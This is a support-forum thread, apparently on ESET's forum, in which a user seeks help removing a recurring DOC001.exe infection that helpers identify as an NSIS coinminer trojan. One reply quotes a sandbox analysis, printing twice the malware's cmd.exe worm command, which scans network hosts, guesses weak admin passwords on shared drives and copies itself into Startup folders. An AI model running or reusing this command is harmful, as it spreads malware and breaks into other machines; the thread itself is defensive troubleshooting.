Gerald KAmande 0 Posted May 23, 2019 Share Posted May 23, 2019 Been hit by DC002. Exe virus. Any help on how I can remove it Link to comment Share on other sites More sharing options...
Administrators Marcos 5,235 Posted May 23, 2019 Administrators Share Posted May 23, 2019 Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum. Link to comment Share on other sites More sharing options...
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 Sorry file name DC001.exc Link to comment Share on other sites More sharing options...
Administrators Marcos 5,235 Posted May 23, 2019 Administrators Share Posted May 23, 2019 Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything. Link to comment Share on other sites More sharing options...
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 tried to send file ..but it cant be attached as its affected Link to comment Share on other sites More sharing options...
itman 1,742 Posted May 23, 2019 Share Posted May 23, 2019 If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ . The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,235 Posted May 23, 2019 Administrators Share Posted May 23, 2019 So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected". Link to comment Share on other sites More sharing options...
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 The first question is how did you know you were infected? i saw on drive C of most computers has that folder. even you delete it , it will re- appear again. Do you have Eset installed and it detected something? I have Eset installed but its not detecting If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware. Link to comment Share on other sites More sharing options...
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 https://malwaretips.com/blogs/remove-doc001-exe/ . i have tried it detects but the virus will still hit on those pcs Link to comment Share on other sites More sharing options...
itman 1,742 Posted May 23, 2019 Share Posted May 23, 2019 (edited) Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it. 1 hour ago, Gerald KAmande said: https://malwaretips.com/blogs/remove-doc001-exe/ . i have tried it detects but the virus will still hit on those pcs Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart? Also after MBAM detected the malware, did you do this? Quote When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the “Quarantine Selected” button. Edited May 23, 2019 by itman Link to comment Share on other sites More sharing options...
itman 1,742 Posted May 23, 2019 Share Posted May 23, 2019 There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it is has loaded itself into every on of them! Quote cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652) cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880) Link to comment Share on other sites More sharing options...
Gerald KAmande 0 Posted May 24, 2019 Author Share Posted May 24, 2019 19 hours ago, itman said: Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it. Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart? Also after MBAM detected the malware, did you do this? i have uploaded the file attached see theresults Link to comment Share on other sites More sharing options...
Administrators Marcos 5,235 Posted May 24, 2019 Administrators Share Posted May 24, 2019 0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application The first one is a NSIS archive, the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive, the detection was added in July 2017. Link to comment Share on other sites More sharing options...
itman 1,742 Posted May 24, 2019 Share Posted May 24, 2019 1 hour ago, Marcos said: 0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security. If the above is too technically advanced for you, contract your regional Eset support concern for assistance: https://www.eset.com/int/ Link to comment Share on other sites More sharing options...
itman 1,742 Posted May 24, 2019 Share Posted May 24, 2019 (edited) For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ . I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 . Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later. Edited May 24, 2019 by itman Link to comment Share on other sites More sharing options...
Recommended Posts